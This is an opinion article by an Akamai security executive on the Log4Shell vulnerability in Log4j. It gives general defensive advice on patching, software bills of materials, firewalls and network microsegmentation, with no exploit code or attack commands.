Richard Meeus, director of security & technology strategy EMEA at Akamai, discusses how organisations can protect themselves against vulnerabilities such as the one recently found within Log4j
For many, the festive period in 2021 saw a slight return to normality and a much calmer Christmas than the year before. But the story was very different for cyber security professionals the world over, who had to contend with an unprecedentedly large-scale vulnerability, which has now come to be known as Log4Shell, or, slightly inaccurately, Log4j.
This critical vulnerability was first discovered on the 9th December 2021, and involves the unauthenticated execution of code from the widely-used Java logging utility, Log4j. Many businesses were compromised by the exploit, which had potentially resulted in the withdrawal of sensitive data. In the weeks following the vulnerability becoming public, Akamai observed a sustained rate of 2 million attacks being attempted per hour, with over half (57%) of this number coming from known cyber attackers. There have also been several examples of high profile attacks using the vulnerability, most notably the Belgian Ministry of Defence being forced to shut down a portion of its network. Amid all the noise, it can be daunting trying to figure out exactly what you should do to protect your business from harm. But there are a number of straightforward actions businesses should take – let’s take a closer look.
A brief history of the Log4j vulnerability and its impact
Log4j is an open source software that records events, such as routine operations or errors in a system, and then communicates diagnostic messages to system administrators. It’s a fairly unglamourous tool, but the catch is that it’s used almost everywhere – making almost everyone potentially vulnerable to hackers exploiting the newly-discovered vulnerability in the Log4j code.
Malicious actors using Log4j to attack businesses are potentially able to get access to confidential and sensitive business information, making it absolutely essential that businesses do all they can to protect themselves.
What to know about open source security
Staying on-top of the latest guidance
As a first step, it is important to keep an eye on service recommendations from the team behind Log4j, which is currently advising that patch 2.17.1 has now provided fixes for this exploit. It is vital to check with your IT team to ensure they are in-step with the latest advice from Log4j.
Understanding your exposure
Once you’ve ensured that urgent patches have been completed, you can begin building your understanding of your exposure through the other online third party tools your business might use. Remember – the challenge with Log4j is that the vulnerability affects so many pieces of software, tools and systems.
As more and more business software is built with layers and layers of third party code, it becomes paramount that businesses assess the risk exposure not just of the software they use, but also of the vendor, and the software that vendor has used to assemble the final product. This is known as a software bill of materials (SBOM), and functions much like a list of ingredients in a ready meal. A large number of vulnerabilities could be ‘baked in’ without you even knowing it.
Visibility is paramount – work with your IT team to make sure risk assessments have this complete picture of how the business’ software has been assembled and where it is running. The more complete this picture, the faster you can react if the worst happens and you do become exposed to malicious actors.
The insecure application conundrum: how to stop the influx of vulnerable applications
Strengthen your firewalls
Alongside the steps above, you should also actively take steps to stop threats. Firstly, make sure you’re running a web application firewall (WAF) on your internal and external servers, to filter out potential attacks. This can be paired with a DNS firewall to assess and clamp down on suspicious DNS payloads that could contain harmful code as in the case of Log4j.
Leveling up your segmentation capabilities
As invaluable as firewalls are, there is also value to be gained from introducing microsegmentation, which is a more advanced and effective way of dividing up your network. If you imagine your network as the hull of a ship which is one whole entity, bulkheads segment the ship to help it stay afloat if one segment is breached. Microsegmentation provides those bulkheads in your network and effectively allows you the ability to swiftly quarantine affected, or vulnerable servers to prevent the spread of unwanted communication between systems.
Ultimately, building a viable security strategy to mitigate logging vulnerabilities of this type requires an understanding of the latest guidance and best-practice, as well as an honest accounting of your own risk levels. From there, you can strengthen and re-tool your range of cyber security products.
Tackling the ‘next Log4j’
Log4j may be big, but it’s not going to be the last of its kind. Cyber security threats are by their nature a constantly moving target, which means that businesses must remain vigilant and informed of industry issues, whilst also making the necessary investments to prevent the potentially devastating costs of a breach or exploit. By adapting to seal off potential attack routes, businesses can strike a victory against cyber criminals.